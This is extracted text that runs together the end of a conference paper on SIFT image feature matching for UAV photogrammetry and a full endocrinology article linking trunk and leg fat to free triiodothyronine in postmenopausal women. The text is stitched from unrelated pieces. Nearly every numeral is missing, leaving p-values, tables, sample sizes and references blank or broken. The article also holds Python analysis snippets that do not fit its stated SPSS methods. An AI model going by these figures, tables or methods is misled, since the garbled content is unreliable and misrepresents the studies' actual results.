progressive image transmission. it is a typical hierarchical data structure form, suitable for multi-resolution organization of raster data and image data, international conference on sensor network and computer engineering (icsnce ) and also a kind of lossy compression of raster data or image data. b. image feature extraction feature extraction refers to using a computer to propose image information of the same name point in the image, which determines the common features in the image. the image feature extraction generally relies on the distribution of grayscale in the image, and the position, shape and size of the features are determined by this information. the sift feature matching algorithm mainly consists of two parts, extracting unrelated vector features from multiple images and matching sift feature vectors. the scale space representation is an area-based expression. as an important concept in the scale space theory, the scale space is defined as the product of a gaussian convolution kernel and a remote sensing image. after derivation by koendetink and babaud et al., it is proved that the gaussian kernel is the only linear kernel that realizes scale transformation. ( ) l(x, y, σ) is a scale space, g(x, y, σ) is a gaussian convolution kernel, and i(x, y) is a remote sensing image. x, y, and σ represent location parameters and scale parameters. ( ) using the scale space function to establish the gaussian pyramid, the scale space function between two adjacent layers is influenced by the scale ratio between adjacent layers and the same order pyramid, and a differential gaussian pyramid is established. the scale ratio between adjacent layers is defined as k, and the scale factor is defined as σ, and d(x, y, σ) is a differential gaussian pyramid. finally, each sample point is compared with the adjacent point in the space of the adjacent vertical and horizontal scales around the scale space of the same level. 
if the detection point is the local maximum or minimum value, the point will be a candidate for image at this scale. iv. experimental test installed visual studio on the computer and configured opencv for experimental testing. the experimental image is shown in figure . sift uses c++ to extract image feature points, uses the two-dimensional feature point matching method brute force matcher to match, sets a certain threshold to filter the matching results, uses the findhomography function to set the ransac method to eliminate false matching, and tests the sift to understand its performance according to the above steps. after the threshold value and the basic matrix filter, the points are basically covered in the key area of the image, the distribution of pixel points is relatively uniform, and the error is low, which can meet the matching requirements of the system. the matching test image is shown in figure . international conference on sensor network and computer engineering (icsnce ) figure . feature matching experiments v. conclusion at present, all countries in the world are stepping up the development of uav. compared to manned aircraft, uav has the advantages of small size, low cost, ease of use, low environmental requirements, and strong survivability. western countries have applied new and high technologies to the development of uav, and advanced signal processing and communication technologies have been used to improve the image transmission speed and digital transmission speed of uav. in this paper, based on the theory of air measurement image preprocessing, the image feature extraction method is studied. visual c + + is used to implement sift to extract the image feature points. the two-dimension feature point matching method bruteforce matcher is used to perform image region matching, and ransac is set by findhomography function to eliminate false matches. we obtain the more satisfactory result of match after experiments. however, due to the deficiencies of uav, it is difficult to compare with the professional image processing system. with the development of communication technology and control technology, uav will surely have breakthrough application and development in the field of low-level measurement in the further. reference [ ] yu sheng, wen caiqiang, liu shangguo. the precision measurement technology of digital camera indoor three-dimensional field [j]. . . [ ] tian lei, ma ran. research on the calibration method of unmanned aerial vehicle (uav) [j]. . . [ ] li xiang, wang yongjun, li zhi. misalignment error and correction of the vector sensor of air position system [j]. journal of sensor technology, . . [ ] c. harris, m. j. stephens. a combined corner and edge detector[c]. prco of the th alvey vision conf, : - . [ ] d. g. lowe. distinctive image features from scale-invariant keypoints[j]. international journal of computer vision. , ( ): - . [ ] d. g. lowe. distinctive image features from scale-invariant keypoints[j]. international journal of computer vision. , ( ): - . : – x nie, y xu and et al. 
fat distribution and thyroid hormones research trunk fat and leg fat in relation to free triiodothyronine in euthyroid postmenopausal women xiaomin nie*, yiting xu*, xiaojing ma, yun shen, yufei wang and yuqian bao department of endocrinology and metabolism, shanghai jiao tong university affiliated sixth people’s hospital; shanghai clinical center for diabetes; shanghai key clinical center for metabolic disease; shanghai diabetes institute; shanghai key laboratory of diabetes mellitus, shanghai, china correspondence should be addressed to x ma or y bao: maxiaojing@sjtu.edu.cn or yqbao@sjtu.edu.cn *(x nie and y xu contributed equally to this work) abstract background: a high level of free triiodothyronine (ft ) within the reference range may be a potential metabolic risk marker. however, the relationship between different fat depots and ft has remained unclear. objective: we aimed to explore the relationships between segmental fat distribution and ft in euthyroid middle-aged and elderly men and postmenopausal women. methods: a total of subjects ( men and women) were enrolled. a bioelectrical impedance analyzer was used to measure total, trunk, arm and leg fat mass (fm) and fat percentage (fat%). the leg fat mass to trunk fat mass ratio (ltr) was calculated to evaluate the relative distribution of leg fat compared with that of trunk fat. thyroid hormones were measured by electrochemical luminescence immunoassay. results: ft in men did not change significantly with increases in ltr quartiles, while ft in women decreased significantly (p for trend =  . ). in multivariate linear regression analysis, multiple metabolic and cardiovascular risk factors were adjusted. the ltr was negatively related to ft in women (p <  . ). after further mutual adjustment for trunk fat and leg fat parameters, trunk fm and fat% were positively related to ft , while leg fm and fat% were negatively related to ft in women (all p <  . ). conclusions: in euthyroid postmenopausal women, trunk fat was positively correlated with ft , whereas leg fat was negatively correlated with ft . our findings supported that a high level of ft within the reference range was related to adverse fat distribution. introduction obesity is the key pathogenic factor of type diabetes and cardiovascular disease ( ). the disease risk associated with obesity is related not only to fat content but also to fat distribution. abdominal obesity characterized by an ‘apple-shape’ significantly increases the risk of type diabetes and cardiovascular disease ( ). in contrast to that, a ‘pear-shape’ with most fat accumulating in the lower body is found to have metabolic and cardiovascular protective effects ( ). free triiodothyronine (ft ) is the bioactive form of thyroxines. ft regulates basal metabolic rate, promotes fat decomposition and acts on the cardiovascular system through adrenergic signaling ( ). previous studies have found that a high level of ft within the reference range was positively related to bmi and waist circumference ( , ). non-alcoholic fatty liver disease (nafld) is one of the most common complications of obesity. in recent years, some studies found that a high level of ft within - - key words f trunk fat f leg fat f trunk fat mass to leg fat mass ratio f free triiodothyronine endocrine connections ( ) , – id: - this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . 
/ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access mailto:maxiaojing@sjtu.edu.cn mailto:yqbao@sjtu.edu.cn https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com x nie, y xu and et al. fat distribution and thyroid hormones pb– : the reference range was related to the risk of nafld and multiple adverse metabolic and cardiovascular risk factors ( , , ), which suggests that a high level of ft within the reference range may be a potential adverse metabolic risk marker. the middle-aged and elderly population is at high risk of metabolic and cardiovascular disease; thus, it is meaningful to explore the associations between different fat depots and ft in this age group. bmi and waist circumference are simple indexes to evaluate obesity, but cannot be used to reflect the distribution of different fat depots. segmental fat depots (trunk, arm and leg) measured by segmental bioelectrical impedance analysis (sbia) are highly consistent with those measured by dual energy x-ray absorptiometry ( ). sbia can accurately evaluate body fat content with simple operation and lightweight size. none of the previous studies have focused on associations between segmental fat distribution and ft . in the present study, we aimed to explore the relationship between segmental fat distribution and ft in euthyroid middle-aged and elderly men and postmenopausal women. trunk fat and leg fat were found to have an inverse relationship with metabolic and cardiovascular disease in previous studies ( , , ). the relationship between arm fat and cardiovascular metabolic risk was nonsignificant or weak ( , ). thus, we calculated the leg fm to trunk fm ratio (ltr) to study the relationship between a tendency of fat to accumulate in the legs rather than trunk and ft . materials and methods study population men and postmenopausal women aged years or older were recruited from shanghai communities from october to july . postmenopausal status was defined as at least year of amenorrhea in the absence of other medical conditions ( ). the methods of population recruitment and data collection were described in our previous study ( ). all participants provided informed consent and received questionnaires, a physical examination, laboratory tests and segmental fat measurements. the exclusion criteria included a history of thyroid disease with thyroxine supplement or anti-thyroid therapy; abnormal thyroid function; a history of diabetes or cardiovascular disease; moderate-to-severe anemia; malignancy or an intracranial mass lesion; severe kidney or liver dysfunction; acute infection; hypoalbuminemia; taking lipid-lowering drugs, hypotensive drugs, weight-loss pills, glucocorticoids, sex hormones, amiodarone or lithium. the study was approved by the ethics committee of the shanghai jiao tong university affiliated sixth people’s hospital and was carried out following the guidelines of the declaration of helsinki. anthropometric and biochemical assessments height, body weight and blood pressure were measured according to standard methods, which were described in our previous study ( ). bmi was equal to the body weight (kg) divided by the height squared (m ). 
systolic blood pressure (sbp) and diastolic blood pressure (dbp) were determined by the mean blood pressure from three measurements taken at -min intervals. all subjects underwent a -g oral glucose tolerance test in the morning after an overnight fast of h. the measurements of fasting plasma glucose (fpg), -h plasma glucose ( h pg), glycated hemoglobin a c (hba c), fasting insulin (fins), triglyceride (tg), total cholesterol (tc), high-density lipoprotein cholesterol (hdl-c), and low-density lipoprotein cholesterol (ldl-c) were performed according to methods described in our previous study ( ). estradiol (e ) was detected by chemiluminescent microparticle immunoassays on an architect i sr analyzer (abbott gmbh & co. kg). the level of insulin resistance was evaluated by the homeostasis model assessment of insulin resistance (homa-ir) with the following formula: homa-ir = fins (mu/l) × fpg (mmol/l)/ . ( ). a cobas e analyzer (roche diagnostics gmbh) was used to measure ft , free thyroxine (ft ) and thyroid-stimulating hormone (tsh). the reference range and intra- and interassay coefficients for ft were . – . pmol/l, < . and < . %, respectively; for ft , they were . – . pmol/l, < . and < . %, respectively; and for tsh, they were . – . miu/l, < . and < . %, respectively. measurement of segmental fat distribution an automatic bioelectrical impedance analyzer (tbf- b; tanita corp., tokyo, japan) was used to measure total, trunk, arm and leg fat mass (fm) and fat percentage (fat%) according to a previously described method ( ). to evaluate the tendency of fat accumulation in the legs rather than the trunk, the ltr was calculated as leg fm (kg) divided by trunk fm (kg). this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com x nie, y xu and et al. fat distribution and thyroid hormones : statistical analysis the normality of the distribution of variables was evaluated by the kolmogorov–smirnov test. normally distributed variables are expressed as the mean ± standard deviation. variables with a skewed distribution are expressed as the median (interquartile range). for normally distributed variables, one-way anova was used for trend analysis. for skewed variables, the kruskal–wallis h-test was used for trend analysis. partial correlation analysis was used to explore the age- and bmi-adjusted relationships between fat parameters and thyroid hormones. multivariate linear regression analysis was used to explore the relationship between segmental fat parameters and thyroid hormones. considering close correlations among segmental fat parameters, multicollinearity was analyzed for each linear regression model. a variance inflation factor > indicated serious multicollinearity. spss version . (spss, inc.) statistical software was used for all data analyses. a two- tailed p value < . was considered statistically significant. results clinical characteristics of the study participants the study included subjects with an age range of – years (mean age ± years). there were men and postmenopausal women. the medians of bmi, total fm and total fat% were . ( . – . ) kg/m , . ( . – . 
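the derived indices used throughout the analysis can be computed directly from the measurements described above. a minimal sketch follows; the variable names and the example subject are ours, and the homa-ir denominator of 22.5 is the standard constant from the matthews et al. formula cited in the text.

```python
def bmi(weight_kg, height_m):
    """body mass index: weight (kg) divided by height squared (m^2)."""
    return weight_kg / (height_m ** 2)

def homa_ir(fins_mu_per_l, fpg_mmol_per_l):
    """homeostasis model assessment of insulin resistance:
    fasting insulin (mu/l) x fasting plasma glucose (mmol/l) / 22.5."""
    return fins_mu_per_l * fpg_mmol_per_l / 22.5

def ltr(leg_fm_kg, trunk_fm_kg):
    """leg fat mass to trunk fat mass ratio from the sbia segmental output."""
    return leg_fm_kg / trunk_fm_kg

# illustrative values for one hypothetical subject
subject = {"weight": 62.0, "height": 1.58, "fins": 8.5, "fpg": 5.4,
           "leg_fm": 7.2, "trunk_fm": 11.5}
print(bmi(subject["weight"], subject["height"]),
      homa_ir(subject["fins"], subject["fpg"]),
      ltr(subject["leg_fm"], subject["trunk_fm"]))
```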
) kg, and . ( . – . )%, respectively. the medians of ft , ft and tsh were . ( . – . ) pmol/l, . ( . – . ) pmol/l and . ( . – . ) miu/l, respectively. both men and women were divided into four groups according to ltr quartiles: q < . , q . – . , q . – . and q > . for men; and q < . , q . – . , q . – . and q > . for women (table ). in men, age, bmi, total fm, total fat%, dbp, fpg, fins, homa-ir and e decreased significantly with increasing ltr quartiles (all p for trend < . ). in women, bmi, total fm, total fat%, sbp, fpg, hba c, fins, homa-ir, tg and e decreased significantly with increasing ltr quartiles (all p for trend < . ). in both genders, hdl-c significantly increased with increasing ltr quartiles (all p for trend < . ). changes of thyroid hormones in ltr quartiles in men, ft , ft and tsh did not significantly change with increasing ltr quartiles (all p > . ). in women, only ft significantly decreased with increasing ltr quartiles. the medians of ft from the q to the q group of ltr quartiles were . ( . – . ) pmol/l, . ( . – . ) pmol/l, . ( . – . ) pmol/l and . ( . – . ) pmol/l (p for trend = . ). in women, ft and tsh did not change significantly with increasing ltr quartiles (all p > . , fig. ). partial correlation analysis of segmental fat parameters and thyroid hormones in men and women, trunk fm was . ( . – . ) kg and . ( . – . ) kg, trunk fat% was . ( . – . )% and . ( . – . )%, arm fm was . ( . – . ) kg and . ( . – . ) kg, arm fat% was . ( . – . )% and . ( . – . )%, leg fm was . ( . – . ) kg and . ( . – . ) kg, leg fat% was . ( . – . )% and . ( . – . )%, and the ltr was . ( . – . ) and . ( . – . ), respectively. age and bmi were adjusted in the partial correlation analysis. in men, none of the fat parameters were related to ft (all p > . ). in women, total fm (r = . , p = . ), total fat% (r = . , p = . ), trunk fm (r = . , p = . ) and trunk fat% (r = . , p = . ) were positively related to ft , while the ltr was negatively related to ft (r = − . , p = . ) (fig. ). in women, leg fm, leg fat%, arm fm and arm fat% were not related to ft (all p > . ). none of the segmental fat parameters were related to ft or tsh in both men and women (all p > . ). multivariate linear regression analysis for thyroid hormones multivariate linear regression analysis was used to explore the relationships between segmental fat parameters and thyroid hormones in women (table ). in model , age, homa-ir, dbp, ldl-c and e were adjusted. only ltr was negatively related to ft (standardized β = − . , p < . ), while total fat and other segmental fat parameters were not related to ft (all p > . ). none of the segmental fat parameters were related to ft or tsh (all p > . ). considering a significant and negative relationship between ltr and ft , trunk fat and leg fat might be confounding factors of one another. thus, we further created model . in model , all confounding factors involved in model were included. in addition, leg fm and trunk fm were mutually adjusted, and leg fat% and trunk fat% were mutually adjusted. trunk fm and trunk this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . 
/ec- - https://ec.bioscientifica.com x nie, y xu and et al. fat distribution and thyroid hormones pb– : fat% were both positively related to ft (standardized β = . and . , respectively, all p < . ). leg fm and leg fat% were both negatively related to ft (standardized β = − . and − . , respectively, all p < . ). discussion in the present study, we found that trunk fat accumulation was related to increased ft in euthyroid postmenopausal women, while increased leg fat accumulation was related to decreased ft . these relationships were independent of multiple metabolic and cardiovascular risk factors. in men, none of the fat parameters were related to thyroid hormones. obesity is closely related to ft . previous studies have found that bmi and waist circumference were positively related to ft in the euthyroid population ( , ). a mendelian randomization study indicated that higher bmi or fm played a causal role in increasing ft levels ( ). simple obesity indexes, such as bmi have been widely used in these studies. there have been few studies of associations between precisely-measured fat distribution and ft . lambrinoudaki et  al. measured abdominal subcutaneous table  clinical characteristics of subjects. parameters ltr quartiles p for trendq q q q men  n –  age (years) ( – ) ( – ) ( – ) ( – ) .  bmi (kg/m ) . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) < .  total fm (kg) . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) < .  total fat% . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) < .  sbp (mmhg) ( – ) ( – ) ( – ) ( – ) .  dbp (mmhg) ( – ) ( – ) ( – ) ( – ) .  fpg (mmol/l) . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) .    h pg (mmol/l) . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) .  hba c (%) . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) .  fins (mu/l) . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) .  homa-ir . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) .  tc (mmol/l) .  ±  . .  ±  . .  ±  . .  ±  . .  tg (mmol/l) . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) .  hdl-c (mmol/l) . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) .  ldl-c (mmol/l) .  ±  . .  ±  . .  ±  . .  ±  . .  e (pmol/l) . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) . women  n –  age (years) ( – ) ( – ) ( – ) ( – ) .  bmi (kg/m ) . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) < .  total fm (kg) . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) < .  total fat% . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) < .  sbp (mmhg) ( – ) ( – ) ( – ) ( – ) .  dbp (mmhg) ( – ) ( – ) ( – ) ( – ) .  fpg (mmol/l) . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) < .   hpg (mmol/l) . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) .  hba c (%) . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) .  fins (mu/l) . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) < .  homa-ir . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) < .  tc (mmol/l) .  ±  . .  ±  . .  ±  . .  ±  . .  tg (mmol/l) . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) < .  hdl-c (mmol/l) . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) < .  ldl-c (mmol/l) .  ±  . .  ±  . .  ±  . .  ±  . .  e (pmol/l) . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) . data were means ± standard deviation or medians (interquartile range). q  <  . , q . – . , q . – . and q  >  . for men; q  <  . , q . – . , q . – . and q  >  . for women.  
h pg, -h plasma glucose; bmi, body mass index; dbp, diastolic blood pressure; fat%, fat percentage; e , estradiol; fins, fasting insulin; fm, fat mass; fpg, fasting plasma glucose; hba c, glycated hemoglobin a c; hdl-c, high-density lipoprotein cholesterol; homa-ir, homeostasis model assessment- insulin resistance; ldl-c, low-density lipoprotein cholesterol; ltr, leg fat mass to trunk fat mass ratio; sbp, systolic blood pressure; tc, total cholesterol; tg, triglyceride. this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com x nie, y xu and et al. fat distribution and thyroid hormones : fat and preperitoneal fat through ultrasonography in euthyroid postmenopausal women. they found that ft was positively associated with subcutaneous fat and preperitoneal fat ( ). sbia directly measures the bioelectrical impedance of the trunk, arms and legs. subsequently, fm and fat% of different fat depots can be calculated based on the bioelectrical impedance. the segmental fat distribution measured by sbia was highly consistent with that measured by dual energy x-ray absorptiometry (r ≥ . , p < . ) ( ). our findings in trunk fat were in consistent with lambrinoudaki`s results. however, we further found a significant and negative relationship between ft and leg fat, while arm fat was not related to thyroid hormones. moreover, our study found that there were no relationships between segmental fat distribution and thyroid hormones in men. in this study, the ltr was calculated to reflect a tendency of fat accumulating in the legs rather than the trunk. in one previous study, gavi et al. also calculated the limb fat to trunk fat ratio. limb fat specifically referred to leg fat in their study. they found that the limb fat to trunk fat ratio was negatively related to insulin resistance and tg and positively related to hdl-c in a middle-aged and elderly population ( ). the middle-aged and elderly population, especially postmenopausal women, is at high risk of metabolic and cardiovascular diseases ( ). in our study, we also chose this high-risk population as study subjects. we found that the ltr was negatively related to ft in postmenopausal women. the correlation coefficient of total fm related to ft was weaker than that of trunk fm related to ft in the partial correlation analysis, and a negative relationship was found between the ltr and ft . thus, we conjectured that leg fat and trunk fat might be confounding factors of one another. in the multivariate linear regression analysis, trunk fat and leg fat parameters were mutually adjusted. we found that trunk fat parameters were positively related to ft and that leg fat parameters were negatively related to ft . the result suggested that leg fat might alleviate the adverse effect between trunk fat and increased ft . a sex difference existed in the relationship between segmental fat distribution and ft in our study, which might because women had a greater propensity to store fat in the lower body driven by the effects of sex hormones ( , , ). figure  thyroid hormones with ltr quartiles. 
ft decreased significantly as ltr quartiles increased in women (p for trend =  . ), but this trend was not significant in men. ft and tsh were not significantly changed as ltr quartiles increased in both men and women. figure  partial correlation analysis of total fm, trunk fm, ltr and ft in women. age and bmi were adjusted. this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com x nie, y xu and et al. fat distribution and thyroid hormones pb– : because ft promotes adipose decomposition and increases the basal metabolic rate ( ), a high level of ft in the obese population was considered a compensatory effect under the condition of energy surplus according to the conventional view ( ). however, in recent years, some studies found that a high level of ft within the reference range is related to an increased risk of nafld ( , ). in the lifelines cohort study, the risk of nafld increased . -fold for each standard deviation increase in ft in the euthyroid population ( ). in a euthyroid chinese population, a high level of ft was an independent predictive factor of nafld ( ). roef et al. found that ft was positively related to multiple adverse metabolic and cardiovascular risk factors in a euthyroid middle-aged population ( ). although there is still a lack of evidence from prospective studies, a high level of ft within the reference range may be a potential adverse metabolic marker. trunk fat and leg fat have exhibited inverse relationships with type diabetes, cardiovascular disease and multiple metabolic and cardiovascular risk factors ( , , , , ). there are large discrepancies between trunk fat and leg fat in the uptake and release of free fatty acids ( ). trunk fat is more sensitive to lipolysis stimulus. leg fat has a lower lipolysis rate and is the ‘storage pool’ of circulating ectopic lipids. leg fat can stabilize free fatty acids that are released by trunk fat and thus decrease lipotoxicity ( ). trunk fat and leg fat also differ in the release of adipokines and inflammatory factors ( , , ); however, few studies have explored the relationships between adipokines and ft . further research is needed to clarify the mechanisms underlying the correlations between trunk fat, leg fat and ft . our study has some limitations. first, the study subjects were middle-aged and elderly; thus, the results may not be generalizable to other age groups. second, the present study did not fully consider some information such as luteinizing hormone, follicle- stimulating hormone and selective estrogen receptor modulators. third, due to the nature of the cross-sectional study, causality cannot be deduced. further prospective studies are needed to elucidate the causal relationship between segmental fat distribution and ft . conclusions in euthyroid postmenopausal women, trunk fat is positively related to ft , while leg fat is negatively related to ft . our findings supported that a high level of ft within the reference range was related to adverse fat distribution. further studies are needed to clarify the causality and underlying mechanisms. 
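for readers who wish to reproduce the mutual-adjustment strategy of model described in the results on their own data, a hedged sketch using statsmodels is given below. this is not the authors' analysis code (the study used spss); the file name and column names are hypothetical, and fitting a single model containing both trunk and leg fat mass alongside the model- covariates is one common way to obtain the mutually adjusted coefficients.

```python
import pandas as pd
import statsmodels.formula.api as smf

# one row per woman; columns assumed numeric and named as below (our names)
df = pd.read_csv("segmental_fat.csv")  # hypothetical file

# ft3 regressed on trunk fm and leg fm together, with the model-1 covariates,
# so each depot's coefficient is adjusted for the other
model = smf.ols(
    "ft3 ~ age + homa_ir + dbp + ldl_c + e2 + trunk_fm + leg_fm", data=df
).fit()
print(model.summary())

# standardized betas can be approximated by z-scoring all variables first
z = (df - df.mean()) / df.std()
model_std = smf.ols(
    "ft3 ~ age + homa_ir + dbp + ldl_c + e2 + trunk_fm + leg_fm", data=z
).fit()
print(model_std.params)
```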
declaration of interest the authors declare that there is no conflict of interest that could be perceived as prejudicing the impartiality of the research reported. table  multivariate linear regression for thyroid hormones in women. independent variables ft ft tsh model  total fat mass . ( . ) . ( . ) − . (− . ) fat% . ( . ) − . (− . ) − . (− . )  trunk fat mass . ( . ) . ( . ) − . (− . ) fat% . ( . ) − . (− . ) − . (− . )  arm fat mass − . (− . ) . ( . ) − . (− . ) fat% . ( . ) − . (− . ) − . (− . )  leg fat mass − . (− . ) . ( . ) − . (− . ) fat% − . (− . ) − . (− . ) − . (− . )  leg fat mass to trunk fat mass ratio − . (− . )a − . (− . ) . ( . ) model  trunk fat mass . ( . )b . ( . ) − . (− . ) fat% . ( . )a . ( . ) − . (− . )  leg fat mass − . (− . )a − . (− . ) . ( . ) fat% − . (− . )a − . (− . ) . ( . ) data were expressed as standardized β (t). ap <  . , bp <  . . model was adjusted for age, homeostasis model assessment-insulin resistance, diastolic blood pressure, low-density lipoprotein cholesterol and estradiol. in model , all confounding factors included in model were adjusted, in addition that trunk fat mass was adjusted for leg fat mass, trunk fat% was adjusted for leg fat%, leg fat mass was adjusted for trunk fat mass, leg fat% was adjusted for trunk fat%. fat%, fat percentage; ft , free triiodothyronine; ft , free thyroxine; tsh, thyroid-stimulating hormone. this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com x nie, y xu and et al. fat distribution and thyroid hormones : funding this work was supported by the national key r&d program of china ( yfa ). references dale ce, fatemifar g, palmer tm, white j, prieto-merino d, zabaneh d, engmann jel, shah t, wong a, warren hr, et al. causal associations of adiposity and body fat distribution with coronary heart disease, stroke subtypes, and type diabetes mellitus: a mendelian randomization analysis. circulation – . (https://doi.org/ . /circulationaha. . ) emdin ca, khera av, natarajan p, klarin d, zekavat sm, hsiao aj & kathiresan s. genetic association of waist-to-hip ratio with cardiometabolic traits, type diabetes, and coronary heart disease. jama – . (https://doi.org/ . /jama. . ) vasan sk, osmond c, canoy d, christodoulides c, neville mj, di gravio c, fall chd & karpe f. comparison of regional fat measurements by dual-energy x-ray absorptiometry and conventional anthropometry and their association with markers of diabetes and cardiovascular disease risk. international journal of obesity – . (https://doi.org/ . /ijo. . ) mullur r, liu yy & brent ga. thyroid hormone regulation of metabolism. physiological reviews – . (https://doi. org/ . /physrev. . ) roef gl, rietzschel er, van daele cm, taes ye, de buyzere ml, gillebert tc & kaufman jm. triiodothyronine and free thyroxine levels are differentially associated with metabolic profile and adiposity-related cardiovascular risk markers in euthyroid middle- aged subjects. thyroid – . (https://doi.org/ . / thy. . ) de pergola g, ciampolillo a, paolotti s, trerotoli p & giorgino r. 
free triiodothyronine and thyroid stimulating hormone are directly associated with waist circumference, independently of insulin resistance, metabolic parameters and blood pressure in overweight and obese women. clinical endocrinology – . (https:// doi.org/ . /j. - . . .x) van den berg eh, van tienhoven-wind lj, amini m, schreuder tc, faber kn, blokzijl h & dullaart rp. higher free triiodothyronine is associated with non-alcoholic fatty liver disease in euthyroid subjects: the lifelines cohort study. metabolism: clinical and experimental – . (https://doi.org/ . /j. metabol. . . ) liu g, zheng x, guan l, jiang z, lin h, jiang q, zhang n, zhang y, zhang x, yu c, et al. free triiodothyronine levels are positively associated with non-alcoholic fatty liver disease in euthyroid middle- aged subjects. endocrine research – . (https://doi.org/ . / . . ) pietrobelli a, rubiano f, st-onge mp & heymsfield sb. new bioimpedance analysis system: improved phenotyping with whole-body analysis. european journal of clinical nutrition – . (https://doi.org/ . /sj.ejcn. ) snijder mb, dekker jm, visser m, bouter lm, stehouwer cd, yudkin js, heine rj, nijpels g, seidell jc & hoorn study. trunk fat and leg fat have independent and opposite associations with fasting and postload glucose levels: the hoorn study. diabetes care – . (https://doi.org/ . /diacare. . . ) wu h, qi q, yu z, sun q, wang j, franco oh, sun l, li h, liu y, hu fb, et al. independent and opposite associations of trunk and leg fat depots with adipokines, inflammatory markers, and metabolic syndrome in middle-aged and older chinese men and women. journal of clinical endocrinology & metabolism – . (https://doi.org/ . /jc. - ) sanchez-lopez m, ortega fb, moya-martinez p, lopez-martinez s, ortiz-galeano i, gomez-marcos ma, sjostrom m & martinez- vizcaino v. leg fat might be more protective than arm fat in relation to lipid profile. european journal of nutrition – . (https://doi.org/ . /s - - - ) hu g, bouchard c, bray ga, greenway fl, johnson wd, newton rl, jr, ravussin e, ryan dh & katzmarzyk pt. trunk versus extremity adiposity and cardiometabolic risk factors in white and african american adults. diabetes care – . (https://doi. org/ . /dc - ) national collaborating centre for women’s and children’s health. menopause: full guideline. clinical guideline: methods, evidence and recommendations. london, uk: national institute for health and care excellence (uk), . (available at: https://www.nice.org.uk/ guidance/ng /evidence/full-guideline- ) xu y, ma x, shen y, gu c, tang j & bao y. role of hyperglycaemia in the relationship between serum osteocalcin levels and relative skeletal muscle index. clinical nutrition [epub]. (https://doi. org/ . /j.clnu. . . ) matthews dr, hosker jp, rudenski as, naylor ba, treacher df & turner rc. homeostasis model assessment: insulin resistance and beta-cell function from fasting plasma glucose and insulin concentrations in man. diabetologia – . (https://doi. org/ . /bf ) taylor pn, richmond r, davies n, sayers a, stevenson k, woltersdorf w, taylor a, groom a, northstone k, ring s, et al. paradoxical relationship between body mass index and thyroid hormone levels: a study using mendelian randomization. journal of clinical endocrinology & metabolism – . (https://doi. org/ . /jc. - ) lambrinoudaki i, armeni e, rizos d, georgiopoulos g, athanasouli f, triantafyllou n, panoulis k, augoulea a, creatsa m, alexandrou a, et al. indices of adiposity and thyroid hormones in euthyroid postmenopausal women. 
european journal of endocrinology – . (https://doi.org/ . /eje- - )
gavi s, feiner jj, melendez mm, mynarcik dc, gelato mc & mcnurlan ma. limb fat to trunk fat ratio in elderly persons is a strong determinant of insulin resistance and adiponectin levels. journals of gerontology. series a, biological sciences and medical sciences – . (https://doi.org/ . /gerona/ . . )
auro k, joensuu a, fischer k, kettunen j, salo p, mattsson h, niironen m, kaprio j, eriksson jg, lehtimaki t, et al. a metabolic view on menopause and ageing. nature communications . (https://doi.org/ . /ncomms )
tchkonia t, thomou t, zhu y, karagiannides i, pothoulakis c, jensen md & kirkland jl. mechanisms and metabolic implications of regional differences among fat depots. cell metabolism – . (https://doi.org/ . /j.cmet. . . )
